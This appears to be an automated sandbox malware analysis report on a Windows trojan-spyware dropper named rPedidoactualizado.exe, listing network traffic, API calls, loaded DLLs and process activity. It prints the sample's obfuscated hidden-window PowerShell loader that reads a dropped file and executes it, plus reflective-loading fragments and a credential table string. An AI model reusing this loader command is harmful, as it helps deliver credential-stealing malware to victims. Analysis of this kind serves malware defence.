          Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
          Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
          Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
          Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: msiexec.exe, 00000005.00000002.3290429199.0000000021622000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/N
          Source: msiexec.exe, 00000005.00000002.3290429199.000000002162C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
          Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
          Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.5:49828 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.5:49838 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49966 version: TLS 1.2
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040543E

          System Summary

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exeJump to dropped file
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_00404C7B0_2_00404C7B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_051FDFE02_2_051FDFE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004EC1465_2_004EC146
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004ED2785_2_004ED278
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004E53625_2_004E5362
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004EC4685_2_004EC468
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004E64985_2_004E6498
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004ED5485_2_004ED548
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004EC7385_2_004EC738
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004EE9885_2_004EE988
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004ECA085_2_004ECA08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004ECCD85_2_004ECCD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004E3E095_2_004E3E09
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004ECFAA5_2_004ECFAA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004EE97A5_2_004EE97A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004EF9745_2_004EF974
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004E9DE05_2_004E9DE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004E6FC85_2_004E6FC8
          Source: rPedidoactualizado.exeStatic PE information: invalid certificate
          Source: rPedidoactualizado.exe, 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs rPedidoactualizado.exe
          Source: rPedidoactualizado.exeBinary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs rPedidoactualizado.exe
          Source: rPedidoactualizado.exe.2.drBinary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs rPedidoactualizado.exe
          Source: rPedidoactualizado.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/12@5/5
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040336C
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046FF
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeCode function: 0_2_00402104 CoCreateInstance,0_2_00402104
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeFile created: C:\Users\user\AppData\Local\downrangeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeFile created: C:\Users\user\AppData\Local\Temp\nsg1F9A.tmpJump to behavior
          Source: rPedidoactualizado.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: msiexec.exe, 00000005.00000002.3290429199.00000000216EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: rPedidoactualizado.exeVirustotal: Detection: 13%
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeFile read: C:\Users\user\Desktop\rPedidoactualizado.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\rPedidoactualizado.exe "C:\Users\user\Desktop\rPedidoactualizado.exe"
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: rPedidoactualizado.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2354527727.0000000008DBD000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000002.00000002.2355081498.00000000096B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Amfetamins152 $Cruelty $Praecoces), (Tagdkninger @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Grundkoncept = [AppDomain]::CurrentDomain.GetAssemblies()$
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Disproportionere221)), $Svmmeturenes).DefineDynamicModule($Rota, $false).DefineType($Brainlessly, $Sentimentaliserede, [System.Multica
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)"
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_051FCE82 push eax; mov dword ptr [esp], edx2_2_051FCE94
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_051FD526 push esp; iretd 2_2_051FD571
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\rPedidoactualizado.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
